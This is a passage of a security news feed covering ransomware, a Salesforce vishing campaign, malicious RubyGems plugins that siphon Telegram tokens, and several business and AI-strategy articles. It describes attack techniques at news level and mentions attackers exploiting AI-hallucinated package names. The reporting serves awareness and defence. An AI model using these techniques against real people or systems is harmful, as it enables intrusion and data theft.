asset will be best positioned to optimize their cloud investments for security, cost, and performance in an increasingly complex digital landscape. To learn more, visit us here. About the author: Pankaj Gupta is Senior Director of Private Cloud Solutions at VMware by Broadcom, where he helps customers unlock the full value of their private cloud investments. Previously, he led go to market initiatives across networking, security, and cloud portfolios at Cisco, Citrix and other leading technology firms.

Law enforcement officials said initial access brokers with ties to Play ransomware operators continue to exploit multiple vulnerabilities in remote monitoring and management tool SimpleHelp.

Law enforcement officials said initial access brokers with ties to Play ransomware operators continue to exploit multiple vulnerabilities in remote monitoring and management tool SimpleHelp.

Salesforce-User in mehreren Branchen wurden Opfer einer gezielten Vishing-Attacke.JHVEPhoto – shutterstock.com Eine neue Welle von Cyberangriffen auf Salesforce-Kunden erfasst aktuell Unternehmen verschiedener Branchen, darunter Gastgewerbe, Einzelhandel und Bildungswesen. Die Google Threat Intelligence Group (GTIG) hat die Angreifer, die sich auf Voice-Phishing (Vishing) spezialisiert haben, als UNC6040 identifiziert. Modifizierte Salesforce-Tools als Einfallstor Berichten zufolge geben sich Vertreter der Gruppe am Telefon als IT-Support-Mitarbeitende aus und überreden die Opfer, eine modifizierte Version des Salesforce Data Loader zu installieren. Die manipulierte Version nutzt die OAuth-basierte Funktion „Connected Apps“ von Salesforce aus, um sich mit der Salesforce-Umgebung der Opfer zu verbinden. Indem die Opfer einen von den Angreifenden bereitgestellten Verbindungscode auf der Setup-Seite für verbundene Apps eingeben, erhalten die Kriminellen direkten Zugriff auf umfangreiche Datenbestände. Die modifizierte Data-Loader-App wird dabei häufig mit einem harmlos klingenden Namen wie „My Ticket Portal“ dargestellt. Ziel ist es, den IT-Support-Vorwand glaubwürdiger erscheinen zu lassen. Hierbei handelt es sich laut den Experten von Google um eine Form von gezielten Social-Engineering-Angriffen, die auf Nachlässigkeiten bei der Zugriffskontrolle und Schulung der Nutzer abzielen. Die Kriminellen hätten keine Schwachstelle von Salesforce ausgenutzt, so GTIG. Seitliche Bewegungen und Erpressungsversuche Sobald die Bande erfolgreich in die Salesforce-Instanzen eingedrungen ist, bewegt sie sich seitlich durch die IT-Infrastruktur der Opfer und greift weitere Cloud-Dienste an, darunter Okta und Microsoft 365. Dabei werden auch Phishing-Panels eingesetzt, um weitere Zugangsdaten und Multi-Faktor-Authentifizierungscodes zu erlangen. Die Experten von GTIG vermuten, dass UNC6040 eine Partnerschaft mit einem zweiten Bedrohungsakteur eingegangen ist, der den Zugang zu den gestohlenen Daten zu Geld macht. „Bislang haben wir noch keine Fälle gesehen, in denen UNC6040 während dieser Kampagne Ransomware eingesetzt hat“, so GTIG-Analyst Austin Larsen im Interview mit The Register. Ähnliche Methoden wie andere Hackergruppen Die gestohlenen Daten werden entweder direkt für Erpressungen genutzt oder an andere kriminelle Gruppen weiterverkauft. Erpressungsversuche treten teilweise erst Monate nach dem initialen Einbruch auf, was laut GTIG auf ein komplexes kriminelles Netzwerk hindeutet. UNC6040 behauptet von sich selbst, dass sie Kontakte zur Gruppe ShinyHunters hätten. Unabhängig von möglichen Partnerschaften setzt UNC6040 Taktiken und Techniken ein, die Ähnlichkeiten mit anderen bekannten Gruppen aufweisen wie Scattered Spiders hybride Vishing-Attacken im Jahr 2024, der Letscall-Malware-Kampagne in Südkorea und dem lose organisierten Kollektiv „The Com“. Dennoch handele es sich laut GTIG um eine eigenständige Gruppe, die sich durch ihre spezifischen Vorgehensweisen unterscheide. Empfehlungen und Schutzmaßnahmen Sowohl die Sicherheitsexperten als auch Salesforce empfehlen eine Reihe von Maßnahmen, um sich gegen diese Art von Angriffen zu schützen. Dazu gehören: Strikte Einhaltung des Prinzips der geringsten Privilegien bei Zugriffsrechten; Überwachung und Kontrolle von verbundenen Apps in Salesforce; Einsatz von IP-basierten Zugriffsbeschränkungen; Verpflichtende Multi-Faktor-Authentifizierung (MFA); Schulungen der Mitarbeiter im Umgang mit Social-Engineering-Angriffen, insbesondere Vishing.

Usaldusnimekirja versiooni 5 uuenemine versiooni 6 vastu tähendab, et kõik infosüsteemid ja tarkvaralahendused, mis digiallkirju loovad või valideerivad, tuleb üle kontrollida, et veenduda kas uus formaat on toetatud ja vajadusel uuendada oma lahendusi.

Der Händler für Outdoor-Ausrüstung Unterwegs wurde gehackt. Dabei sind möglicherweise Kundendaten abgeflossen.ORIONF – shutterstock.com Der Unterwegs Outdoor Shop wurde nach eigenen Angaben Ende Mai Ziel einer Cyberattacke. Wie aus einem Rundschreiben an die Kunden hervorgeht, konnten die Angreifer dabei potenziell Zugriff auf Kundendaten erlangen. „Aufgrund unserer Erkenntnisse aus den Untersuchungen des Vorfalls können wir leider nicht ausschließen, dass auch Kundendaten manipuliert und/oder kopiert wurden“, räumt das Unternehmen ein. Demnach sind sowohl Kunden des Onlineshops als auch der stationären Ladengeschäfte betroffen. Unterwegs betreibt deutschlandweit 24 Filialen. Dem Schreiben zufolge zählen zu den potenziell betroffenen Kundendaten: vollständige Namen, Liefer- und Rechnungsadressen, E-Mail-Adressen, Rufnummern und Anmeldedaten von registrierten Nutzern des Onlineshops. Bankdaten wurden demnach offenbar nicht abgegriffen. Sicherheitsmaßnahmen Der Outdoor-Spezialist warnt allerdings davor, dass die Daten für Phishing-Angriffe und andere betrügerische Aktivitäten im Netz eingesetzt werden könnten. Aus Sicherheitsgründen hat das Unternehmen die Passwörter für den unter unterwegs.biz erreichbaren Onlineshop zurückgesetzt. Zudem rät Unterwegs allen betroffenen Kunden, Vorsicht bei E-Mails oder Nachrichten walten zu lassen, die nach persönlichen Informationen oder Login-Daten fragen. Nach Angaben des Unternehmens wurden bereits alle zuständigen Behörden über den Vorfall informiert. Hintergründe des Angriffs noch nicht bekannt Weitere Informationen zu dem Angriff gibt es jedoch bisher nicht. Somit ist noch unklar, wie die Täter in die Systeme des Outdoor-Shops eindringen konnten. Auch hat sich scheinbar bislang keine Hackergruppe zu dem Angriff bekannt. Lesetipp: Diese Unternehmen hat es schon erwischt

Cellebrite and Corellium, whose names have been mentioned in spyware stories, are joining forces to provide advanced investigative solutions. The post Controversial Firms Cellebrite and Corellium Announce $200 Million Acquisition Deal appeared first on SecurityWeek.

Two cybersecurity companies issued reports tying a cyber-espionage group known as Bitter or TA397 more directly to the Indian government.

Cellebrite said the deal will help with the "accelerated identification of mobile vulnerabilities and exploits."

Microsoft (Nasdaq:MSFT) has announced a comprehensive cybersecurity program that will provide free AI-powered defense tools to European governments facing increasing attacks from Russian, Chinese, Iranian, and North Korean state-sponsored hackers. The European Security Program, unveiled in Berlin by Microsoft Vice Chair Brad Smith, will offer threat intelligence, automated attack disruption, and investigative support to all 27 EU member states, plus the UK, the EU accession countries, and European Free Trade Association members at no cost. “Ransomware groups and state-sponsored actors from Russia, China, Iran, and North Korea continue to grow in scope and sophistication, and European cyber protection cannot afford to stand still,” Smith wrote in a blog post. The program represents an expansion of Microsoft’s existing Government Security Program and implements one of five European Digital Commitments the company made in Brussels five weeks ago. Rising threat environment Microsoft’s move comes as the company documents persistent threat activity targeting European networks. Russian operators remain focused on Ukraine and European nations supporting Ukraine’s defense efforts, while Chinese threat actors have launched systematic campaigns against academic institutions and think tanks. The threat landscape has grown more complex with AI entering cybersecurity operations. Microsoft now tracks threat actors using AI for reconnaissance, vulnerability research, social engineering, and brute force attacks. “Microsoft has observed AI use by threat actors for reconnaissance, vulnerability research, translation, LLM-refined operational command techniques, resource development, scripting techniques, detection evasion, social engineering, and brute force attacks,” Smith added. Three-component strategy The European Security Program will operate through three main components designed to strengthen continental cyber defenses. The first element centers on enhanced threat intelligence sharing, where Microsoft will provide European governments with AI-enhanced, real-time insights into nation-state tactics. The company’s Digital Crimes Unit will expand intelligence sharing through the Cybercrime Threat Intelligence Program, giving European partners immediate access to takedown operations and threat actor movements, the blog added. The program’s second component focuses on strengthening cybersecurity capacity through direct collaboration. Microsoft is embedding its investigators inside Europol’s European Cybercrime Centre in The Hague through a pilot program that will create joint investigation capabilities. The company has also renewed its partnership with the CyberPeace Institute, deploying nearly 100 Microsoft volunteers to defend vulnerable targets. The third element involves expanding disruption partnerships through the Statutory Automated Disruption Program, launched in April 2025. This system automatically triggers legal abuse notifications to hosting providers, rapidly dismantling malicious domains and IP addresses across Europe and the US. Each participating government will receive a dedicated Microsoft point of contact to coordinate responses and escalate concerns. Strategic and competitive implications Industry analysts view the program as strategically significant beyond cybersecurity. Praharsh Srivastava, senior analyst at Everest Group, said Microsoft’s initiative positions the company “ahead of rivals like Google Cloud, AWS, and IBM” while building long-term government relationships that “may drive future commercial gains through paid services, cloud adoption, and AI solutions.” Sanchit Vir Gogia, chief analyst at Greyhound Research, described the program as “a strategic escalation in the platform wars, where cybersecurity is no longer a revenue line — it is a loyalty lock.” “By embedding premium services—from forensic investigations to national-level threat coordination—into a zero-cost model, Microsoft is not just displacing point solution vendors. It’s solidifying its claim as a foundational infrastructure partner,” Gogia said. Track record of operations Microsoft brings substantial experience to the initiative. The company has conducted seven legal actions against nation-state threat actors since 2016, targeting groups it internally codes as Blizzard (Russia), Typhoon (China), Sandstorm (Iran), and Sleet (North Korea). Recent operations demonstrate this capability. In September 2024, Microsoft disrupted Russian group Star Blizzard’s activities, seizing over 140 malicious domains and forcing the group to abandon established attack methods. Last month, the company worked with Europol to take down the Lumma infostealer malware, neutralizing nearly 400,000 infected devices and seizing over 2,300 command-and-control domains. Digital sovereignty and operational challenges The program, however, raises questions about European digital sovereignty and operational complexity. Srivastava noted that while Microsoft’s initiatives offer immediate cybersecurity benefits, they “intersect with the EU’s emphasis on digital sovereignty and may increase dependency on non-European providers.” Gogia highlighted coordination challenges across Europe’s diverse landscape. “There is no common legal backbone across EU states for defining, reporting, or remediating cyber threats,” he observed. “What counts as a critical incident in one country may not even trigger an alert in another.” The program arrives as European policymakers implement comprehensive cybersecurity frameworks, including the EU’s Network and Information Security Directive and the proposed Cyber Resilience Act. Microsoft said it will make the program available immediately to eligible European governments. The initiative extends beyond immediate threat response to include investments in cybersecurity research, talent development, and open-source security improvements.

Cofense Intelligence uncovers a surge in ClickFix email scams impersonating Booking.com, delivering RATs and info-stealers. Learn how these…

An ongoing supply chain attack is targeting the RubyGems ecosystem to publish malicious packages intended to steal sensitive Telegram data. Published by a threat actor using multiple accounts under aliases Bùi nam, buidanhnam, and si_mobile, the malicious gems (ruby packages) pose as legitimate Fastlane plugins and exfiltrate data to an actor-controlled command and control (C2) server. Fastlane is a popular open-source tool, used extensively in CI/CD pipelines, to automate building, testing, and releasing mobile apps (iOS and Android). “Malicious actors take advantage of the trust inherent in open-source environments by embedding harmful code that can jeopardize systems, steal sensitive information, or, in this case, misdirect critical API traffic,” said Eric Schwake, director of cybersecurity strategy at Salt Security. “The identification of certain Ruby gems aimed at exfiltrating Telegram API tokens and messages highlights a significant and ongoing risk to the software supply chain.” The ongoing attack was first spotted by Socket’s Threat Research Team, who noted that the malicious gems appeared just days after Vietnam’s nationwide Telegram ban, likely to exploit the heightened demand for Telegram workarounds with “proxy” offerings. Two rogue plugins in circulation Threat actor published two malicious gems: “fastlane-plugin-telegram-proxy” and “fastlane-plugin-proxy_telegram,” near-identical clones of the legitimate “fastlane-plugin-telegram.” While the packages retained all the same functionalities and documentation of the legitimate plugin, they added a critical alteration. The modified gems featured a redirect for all Telegram API traffic to an actor-controlled C2. “These gems silently exfiltrate all data sent to the Telegram API (used by the Fastlane plugin) by redirecting traffic through a C2 server controlled by the threat actor,” security researcher Kirill Boychenko said in a blog post. “This includes bot tokens, chat IDs, message content, and attached files.” Threat actors modified the legitimate plugin behavior of sending messages to Telegram using the Telegram Bot API by replacing the Telegram API endpoint (https:/api.telegra.org) with their own (C2) server. “A single line swap rerouted every Telegram API call through a Cloudflare Worker under an attacker’s control, siphoning tokens, files, IDs, and more,” said Jason Soroko, Senior Fellow at Sectigo. Risk may extend past the regional ban The malicious packages (Gems) were published by the threat actor on May 24, 2025, three days after Vietnam’s Ministry of Information and Communications ordered a nationwide ban on Telegram and gave internet service providers until June 2 to report compliance. Apart from the timing, the aliases used by the threat actor also suggested a Vietnamese theme, along with the “Telegram proxy” hook used for marketing the gems. While seemingly targeted, the attack may still have impacts outside of the ban. “The operator, using Vietnamese-language aliases, pushed the gems days after Vietnam banned Telegram, but the code has no geofence, so any Fastlane pipeline that pulled the plugin was compromised,” Soroko explained. For potential targets, Boychenko recommended verifying Telegram proxies—if they are looking for one—by checking for open-source licensing, transparent author details, configurable endpoints (not silent, hardcoded replacements), and clear privacy and logging policies. Typosquatting dependencies remain a popular supply chain attack technique. Recently, attackers were found dropping over 60 malicious npm packages within two weeks to steal network information, a discovery also reported by Boychenko. Malicious actors have also begun a novel approach of exploiting AI hallucinations to carry out SlopSquatting attacks, publishing malicious packages with names that AI tools might incorrectly suggest to developers.

At Infosecurity Europe 2025, Axonius’ Jon Ridyard proposed seven best practices to build mature vulnerability management processes

CERT Polska is observing a malicious email campaign conducted by the UNC1151 group against Polish entities, exploiting a vulnerability in the Roundcube software.

Security leaders share their thoughts on the importance of compliance and trust for certificate authorities.

Sagar Steven Singh and Nicholas Ceraolo, members of the Vile group, get prison sentences for identity theft and hacking. The post Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison appeared first on SecurityWeek.

Researchers have discovered and analyzed a ClickFix attack that uses a fake Cloudflare ‘humanness’ check. The post ClickFix Attack Exploits Fake Cloudflare Turnstile to Deliver Malware appeared first on SecurityWeek.

The German data protection authority (BfDI) has fined Vodafone GmbH, the telecommunications company's German subsidiary, €45 million ($51.4 million) for privacy and security violations.

Organized criminals used phished data to set up dodgy HMRC accounts and demand tax rebates

Security teams face growing demands with more tools, more data, and higher expectations than ever. Boards approve large security budgets, yet still ask the same question: what is the business getting in return? CISOs respond with reports on controls and vulnerability counts – but executives want to understand risk in terms of financial exposure, operational impact, and avoiding loss. The...

Play ransomware attacks have hit roughly 900 organizations and recently involved the exploitation of SimpleHelp vulnerabilities. The post FBI Aware of 900 Organizations Hit by Play Ransomware appeared first on SecurityWeek.

This leadership position highlights our commitment to helping enterprises navigate complexity with agility, intelligence, and confidence.

“Don’t start with what AI can do. Start with what your business needs to do better.”  That quote captures the most important lesson I’ve learned from working closely with dozens of organizations implementing AI. While the headlines obsess over the latest breakthroughs in generative AI or agent-based models, the real question executives should be asking is: How will this help us solve the problems that matter most to our business? We’re at a turning point. AI is no longer confined to innovation labs or proof-of-concepts. It’s being embedded in operations, products and customer experiences across every industry. But for all the excitement, many companies are still struggling to extract real value. Too many AI initiatives start with the tools, not the outcomes. And when that happens, hype overwhelms impact. I want to share what I’ve seen work — and not work — when it comes to driving ROI from AI investments. I’ll draw from real-world customer experiences, third-party research and my own observations, helping organizations align AI to business goals. The good news? When companies focus on outcomes, not just algorithms, AI delivers extraordinary returns.  The problem: When AI becomes a distraction AI can be a powerful enabler, but only when deployed with intention and purpose. Too often, companies rush into AI projects without a clear problem to solve. The result? Initiatives that lack a path to production, are owned by no one and deliver little to no value. I’ve seen the same failure patterns repeat: AI pilots that never scale, fragmented and disconnected tools introduced without alignment to existing processes and impressive demos that quickly gather dust. Research confirms this trend: many AI projects fail to produce ROI because they aren’t anchored to measurable business outcomes. A better way: Start with outcomes, not algorithms AI projects should begin not with the tool, but with the business problem. A more effective approach starts by defining the desired outcome and working backward to determine where AI can make a meaningful impact. When evaluating potential AI initiatives, organizations should ask two core questions: First, understand the business impact. Will this improve speed, reduce cost, increase accuracy or enhance customer experience? Next, evaluate the business differentiation. Will it give us a competitive edge by enabling something better, faster or more intelligent than the status quo? The most compelling opportunities lie at the intersection of operational efficiency and strategic differentiation. These aren’t proof-of-concepts; they’re business accelerators that deliver real value aligned against your strategic outcomes. Whether it’s shortening decision cycles, improving customer response times or optimizing resource allocation, the value lies in applying AI where it enhances performance and sets the business apart. AI shouldn’t be deployed just to tick an innovation box. Its purpose is to eliminate friction, unlock new value and reinforce the workflows that matter most. When organizations begin with a clear understanding of the outcomes they want to achieve, they can move beyond tactical wins and toward scalable, sustained impact. That outcome-first mindset is what separates AI hype from genuine ROI. The ROI of doing it right: What the data says Recent research from Nucleus Research provides concrete evidence of the ROI possible when AI and no-code automation are tightly aligned to business priorities. Based on interviews with enterprises, Nucleus found that organizations adopting this approach achieved substantial and measurable business results. Organizations reported an average 37% reduction in total technology costs, driven by simplified integrations, reduced IT overhead and a more predictable pricing structure. These cost savings were complemented by a 70% reduction in implementation timelines, allowing organizations to go live faster and realize value sooner compared to traditional platforms. Operational efficiency also improved significantly. One key area was lead management: customers cited a 61% decrease in lead response times, supported by real-time routing and automation, which led to an 11% average increase in conversion rates. In parallel, AI-enabled workflow automation reduced manual data entry by 17%, freeing up employee time and increasing productivity. Perhaps most importantly, customers reported that these gains helped them become more agile in responding to market conditions and sustaining continuous improvement, reinforcing that AI success is not just about savings, but about enabling scale, speed and adaptability across the business. The organizations that follow these 5 principles maximize AI ROI The difference between hype and impact often comes down to execution. In my experience, the organizations seeing the strongest ROI from AI share five habits: 1. Start with a business goal Before you write a line of code, align AI with a specific operational outcome The most successful AI initiatives start with clarity. That means defining exactly what needs to change, whether it’s reducing customer churn, speeding up internal workflows, improving forecasting or enhancing user engagement. Without a clear goal, even a technically sound AI solution may fail to gain traction. I always encourage teams to avoid jumping straight into building or buying solutions. Instead, pause to align on KPIs. What will success look like? How will we measure improvement? That clarity keeps projects grounded. Example: A sales organization wanted to improve forecasting accuracy and reduce the time spent on manual pipeline updates. By applying AI use against these priority outcomes, they began by having AI analyze sales activity data and automatically score deal likelihood, they reduced forecast variance by 25% and freed up reps to spend more time selling. 2. Don’t automate for the sake of it. Target friction Prioritize augmenting high-friction processes, don’t chase novelty Not every process needs AI and not every AI use case creates real value. The best returns come when AI addresses bottlenecks that were previously too manual, error-prone or inconsistent. That’s where AI adds tangible speed, scale and intelligence. A good litmus test is this: If a process already runs smoothly and quickly, automating it with AI may yield minimal ROI. But if it involves repeated back-and-forth, time-consuming review or judgment-based decisions, AI can drastically improve throughput and consistency. Example: Marketing teams often have access to large amounts of fragmented data but lack the ability to rationalize it and analyze it effectively.   This missed opportunity led a bank’s marketing team to use AI to optimize campaign targeting by analyzing historical performance and real-time engagement data. The result was a 20% increase in click-through rates and fewer wasted impressions across digital channels. 3. Make AI transparent, trackable and tied to metrics Start with explainable, measurable use cases and track improvements The ability to track AI’s contribution isn’t just important for ROI reporting — it’s essential for trust. Business users are more likely to embrace AI when they understand what it’s doing and why. This means surfacing decision logic, offering override options and building a feedback loop. At the same time, measurement must be built in from the beginning. Don’t wait until after launch to define success criteria. Know upfront how you’ll measure efficiency gains, quality improvements or time saved. Example: A customer service team for a regional manufacturing firm implemented AI to suggest next-best responses and assist with case summarization. By measuring reduction in average handle time and improvements in first contact resolution, they built internal confidence in the use of AI models and justified broader rollout. 4. Think beyond the pilot. Design for real-world use Ensure adoption through UX + training and not just deployment  AI must be easy to use and deeply integrated into the tools people already rely on. That requires thoughtful UX and a rollout plan that includes not only training, but context: why the AI exists, how it helps and what users can expect. Too many AI pilots fail not because the model is inaccurate, but because the experience is disconnected. It feels bolted on, unfamiliar or hard to access. The best implementations remove steps, not add them. Example: A city government integrated AI into their case system and 311 processes. With minimal training, adoption surged because the AI was actually simpler and easier to use and actually saved staff time. 5. Build for change, not one-off wins Design for adaptability. Processes and AI will evolve Your first version of an AI solution won’t be your last and it shouldn’t be. Business priorities evolve, data changes and models drift. That’s why adaptability is critical. Rather than locking in hard-coded logic or static integrations, use configurable no-code platforms that allow adjustments without heavy engineering. Equip your teams with tools to fine-tune processes over time. The goal isn’t just initial success, but rather sustainability. Example: A customer success team used AI to monitor account health and proactively flag churn risks. Over time, they continually adjusted the model using no-code tools to include new behavior patterns and feedback from account managers, ensuring the system remained relevant and accurate. AI that works for the business, not the hype The companies seeing real returns from AI aren’t chasing trends but rather solving real problems. They treat AI not as a novelty, but as a lever for operational scale, decision velocity and competitive edge. When done right, AI becomes a multiplier. It sharpens execution, accelerates learning and personalizes at scale. The takeaway? Success doesn’t start with the model. It starts with a business problem worth solving. So, ask yourself: Where is your ROI hiding? Where is your untapped value? That’s where AI belongs. This article is published as part of the Foundry Expert Contributor Network.Want to join?

SQL Injection vulnerability (CVE-2025-4568) has been found in 2ClickPortal software.

An Iran-aligned hacking group has been attributed to a new set of cyber attacks targeting Kurdish and Iraqi government officials in early 2024. The activity is tied to a threat group ESET tracks as BladedFeline, which is assessed with medium confidence to be a sub-cluster within OilRig, a known Iranian nation-state cyber actor. It's said to be active since September 2017, when it targeted...

As data breaches rise and public trust flickers, Australia has taken a bold step in reforming its Privacy Act, marking one of the significant regulatory shifts in the region’s digital history. To decode what this means for businesses, The Cyber Express sat down with Madhuri Nandi, Head of Security at Till Payments, Australia.  With nearly 20 years in cybersecurity leadership, Nandi brings a sharp perspective on how these changes impact legal, IT, and security teams alike.  Madhuri Nandi Explains the Expanded Definition of Personal Data  In the interview, Nandi highlights that the sheer scale of recent breaches in Australia triggered the Privacy Act overhaul, pointing to the outdated nature of the previous regulations. She explains that the definition of personal data has now broadened to include behavioral and inferred data, increasing accountability for companies collecting and processing user information.  “You’re not playing the small game anymore. If you don’t handle data properly, you’re looking at penalties as high as $50 million or 30% of your turnover,” she warns.  Nandi also notes a cultural shift: where once privacy was a checkbox exercise, now legal and cybersecurity teams are collaborating from the start of the product lifecycle.   On the broader opportunity, she adds, “Businesses that respect data today are the ones who will win customer trust and competitive edge tomorrow.”  The conversation also touches on the role of AI and personal data risks, as well as the strengthened powers of the Office of the Australian Information Commissioner (OAIC) to audit organizations without formal complaints.  Watch the Full Interview:  To dive deeper into Madhuri Nandi’s expert insights on regulatory trends, privacy-first leadership, and cybersecurity best practices in Australia, Click here to watch the full interview on YouTube

End-of-life data management, be it deletion of what is no longer required, or data removal from hardware before it’s decommissioned, may not get the attention that data loss through breaches generates, but it’s equally critical — and equally dangerous, with almost half of enterprises failing to destroy data they no longer need, according to a new survey. In its 2025 State of Data Sanitization Report, released on Wednesday, data erasure specialist Blancco revealed that companies globally are being driven to react to these risks by pressures around data security (especially with the advent of AI), regulatory compliance, and sustainability. While 86% of enterprises have suffered a data breach in the last three years, 73% have experienced a data leak, typically caused by process failure or human error, according to the survey of 2,000 cybersecurity, IT, and sustainability leaders at large enterprises around the world.

It’s definitely not a cyberattack though! Really! The UK's tax collections agency says cyberbaddies defrauded it of £47 million ($63 million) late last year, but insists the criminal case was not a cyberattack.

During the project, financial support will be granted for activities such as implementing new cybersecurity regulations. The aim is to strengthen cybersecurity both in Europe and nationally.

During the project, financial support will be granted for activities such as implementing new cybersecurity regulations. The aim is to strengthen cybersecurity both in Europe and nationally.

Authorities seized 145 domains associated with BidenCash, a marketplace for stolen credit cards and personal information. The post Carding Marketplace BidenCash Shut Down by Authorities  appeared first on SecurityWeek.

The U.S. Department of Justice (DoJ) on Wednesday announced the seizure of cryptocurrency funds and about 145 clearnet and dark web domains associated with an illicit carding marketplace called BidenCash. "The operators of the BidenCash marketplace use the platform to simplify the process of buying and selling stolen credit cards and associated personal information," the DoJ said. "BidenCash...

Moderna has made headlines in recent weeks for an unusual structural shift that blends two traditionally separate functions: human resources and information technology. Following the departure of its CIO and a trimming of its digital team, the company folded the IT department under the leadership of its chief human resources officer. For many, this raised eyebrows. Is Moderna predicting a new normal where HR and IT converge, especially in an AI-first enterprise? Possibly, but I don’t think so. Moderna’s decision is bold and, in many ways, unprecedented. But I would recommend that it should not be mistaken as a sign of things to come across the broader enterprise landscape. Not yet anyway. Context is important in understanding the company’s decision here. (See also: Taking stock of human capital in the age of AI.) The context behind Moderna’s decision To understand the rationale, we must consider the factors unique to this company. Moderna is a pioneer in biotechnology and a trailblazer in adopting artificial intelligence (AI) across its operations. From drug discovery to digital marketing, AI is deeply embedded in its strategic road map. In fact, as reported in TheInformation.com, it appears that a conversation about ChatGPT was a key catalyst in Moderna’s decision to merge HR and IT.CEO Stéphane Bancel reportedly saw the increasing entanglement of AI in workplace functions and organizational design as an opportunity to reimagine how Moderna’s tech and its people interface. Moderna has also partnered extensively with OpenAI, leveraging advanced AI systems not just for scientific innovation but also for back-office efficiency. A recent article details how Moderna uses OpenAI’s tools to streamline both technical and HR-related workflows for automating candidate screening, internal ticketing, and employee onboarding. In such an environment, where AI acts as the connective tissue between systems and people, the argument to bring HR and IT together is certainly intriguing and not surprising. Jensen Huang, NVIDIA’s CEO, hinted at this evolution when he said, “In a lot of ways, the IT department of every company is going to be the HR department of AI agents in the future.” At Moderna, this vision is not theoretical; it is already in motion. But the capability to act on this convergence is contingent on something Moderna happens to have already: an HR leader with deep technological acumen. (See also: Why HR professionals struggle with big data.) Tracey Franklin: A unique catalyst Moderna’s HR-IT merger is less about an industry trend and more about the capability of one individual: Tracey Franklin. As The Wall Street Journal reported, Franklin’s background includes not only traditional HR expertise but also a strong grasp of the company’s digital transformation initiatives. She is not a typical CHRO. Her ability to lead both domains stems from her proximity to Moderna’s evolving AI strategy and her alignment with the executive vision of a highly integrated enterprise. This type of executive is rare. Most CHROs, while highly skilled in people strategy and organizational design, do not possess the technical depth required to lead IT. Conversely, most CIOs are not equipped to take on employee experience or talent development at scale. Moderna’s situation is not easily replicable because it is built on a unique overlap of leadership capability, organizational maturity, AI fluency, and an existing executive team member capable of tackling them all. Why this model won’t work for everyone It is tempting to view Moderna’s move as a bellwether for the future as AI takes a stronger and deeper foothold within enterprises. However, broader enterprise trends suggest otherwise. AI adoption is still nascent in many companies, and even where it is growing, the tools are often siloed within specific functions like customer support, marketing automation, or supply chain optimization. The level of enterprisewide AI integration that Moderna exhibits is the exception, not the rule. Most of the AI adoption is currently happening based on the AI capabilities that traditional IT and SaaS vendors are building into their offerings, rather than specific and targeted AI implementations being custom-built within an enterprise for a specific workflow and purpose. In addition, organizational design is historically slow to evolve. The risks of combining IT and HR, which are two departments with vastly different cultures, compliance requirements, and performance metrics, are nontrivial. Even at Moderna, the change followed layoffs and leadership turnover, suggesting that it was at least partly a restructuring driven by internal realignment rather than a proactive, strategic, leading indicator of a wider organizational model. It is also important to note that cautionary tales are still emerging with regard to AI adoption. Gizmodo recently reported that Klarna, a fintech company that once leaned heavily into AI to replace human customer service, is now hiring back human staff due to AI shortfalls in empathy and nuance. The implication is that while AI can augment, it rarely replaces human judgment wholesale, particularly in functions like HR that are inherently nuanced in human interactions and interpersonal relationships. (See also: Legacy federal government HR systems: A billion dollar problem, says Workday survey.) The CIO Perspective: Focus on partnership, not merger As CIOs, we should see Moderna’s move not as a threat to our domain but as a signal of evolving partnerships and collaboration. The CIO’s role has been evolving to become more strategic and more cross-functional for quite some time, and this is only growing in importance as AI redefines how work gets done. But merging with HR is not a necessary step to lead in this transformation. Instead, CIOs should work closely with CHROs to establish clear collaboration models where AI-driven decisions are transparent, ethical, and human-centered. CIOs will continue to own the architecture, security, and integration of AI platforms. HR will continue to shape the experience of employees (and now AI agents) within that digital environment. These domains must collaborate deeply, but structural integration is not necessary and, in most cases, counterproductive. Moderna’s HR-IT fusion is innovative, but it’s also deeply situational and very unique. It reflects the specific capabilities of its leadership, the depth of its AI integration, and its willingness to experiment. For most organizations, the future lies not in merging these departments, but in aligning them and building collaborative relationships with shared goals, mutual understanding, and the right balance between human and machine capabilities. So, while the Moderna case is worth watching, it should be viewed as a singular experiment, not a template. The CIO and CHRO will be powerful allies in the age of AI, but they are still best kept in separate seats at the table. Learn more about IDC’s research for technology leaders OR subscribe today to receive industry-leading research directly to your inbox. International Data Corporation (IDC) is the premier global provider of market intelligence, advisory services, and events for the technology markets. IDC is a wholly owned subsidiary of International Data Group (IDG Inc.), the world’s leading tech media, data, and marketing services company. Recently voted Analyst Firm of the Year for the third consecutive time, IDC’s Technology Leader Solutions provide you with expert guidance backed by our industry-leading research and advisory services, robust leadership and development programs, and best-in-class benchmarking and sourcing intelligence data from the industry’s most experienced advisors. Contact us today to learn more. Dr. Ken Knapton is an adjunct research advisor for IDC’s IT Executive Programs (IEP). He is a thought leader in enterprise tech debt, big data governance, and agile delivery principles. And he is an accomplished technology leader with extensive experience in leading IT functions, driving efficiency, enabling workflow automation, and delivering improved business outcomes. He has held C-level IT roles in various industries for the past two decades, with a focus on regulatory compliance as well as modernizing, maturing, and securing IT organizations. With his strong focus on people, process, and technology (in that order) he has helped to elevate the IT operations in organizations such as Merrick Bank, Content Watch, Access Data, W.J. Bradley Mortgage Capital, Credit.com, and Avalon Healthcare. Dr. Knapton helped design and architect the global banking system that is currently in use for the Church of Jesus Christ of Latter-day Saints, supporting 127 different currencies in as many countries.

A huge wave of IT layoffs — with more than 238,000 jobs lost in 2024 and another 76,000 so far in 2025 — isn’t likely to die down soon, as organizations brace for a potential recession and look for huge workforce cuts through the use of AI. While many AI evangelists have played down the potential for the technology to replace human workers, that message hasn’t resonated in board rooms, as company leaders look to reinvent their business operations, IT hiring experts say. Many boards of directors are now pushing CEOs to cut 20% of workforce costs, with the expectation that AI will take over the eliminated jobs, says Camille Fetter, CEO at Talentfoot Executive Search & Staffing. Spurred in part by worries of a coming recession, many companies are prioritizing efficiency and agility, she adds. “Companies are reconfiguring their org charts to improve efficiency and reduce middle management bloat,” Fetter adds. “I’m at CEO dinners constantly, and they’re all saying, ‘If you don’t have plans to replace at least 20% of your workforce with these new technologies and efficiencies, then you’re not looking through the right lens.’” May is a bad month In May alone, Microsoft announced layoffs of 3% of its workforce, about 6,000 people, after CEO Satya Nadella noted earlier that up to 30% of the company’s own code is written by AI. Days later, Walmart announced 1,500 layoffs, with members of its global tech team among them. Less than a week after the Walmart cuts, IBM reportedly laid off 8,000 employees, with many HR workers replaced by AI. Along with a push for efficiency through AI, responsible company leaders have also created plans for weathering a recession, Fetter says, even as J.P. Morgan Research has reduced the probability of a recession starting in 2025 from 60% to 40%. “CEOs all have a recession plan that they probably have solidified by probably the end of Q1,” Fetter says. 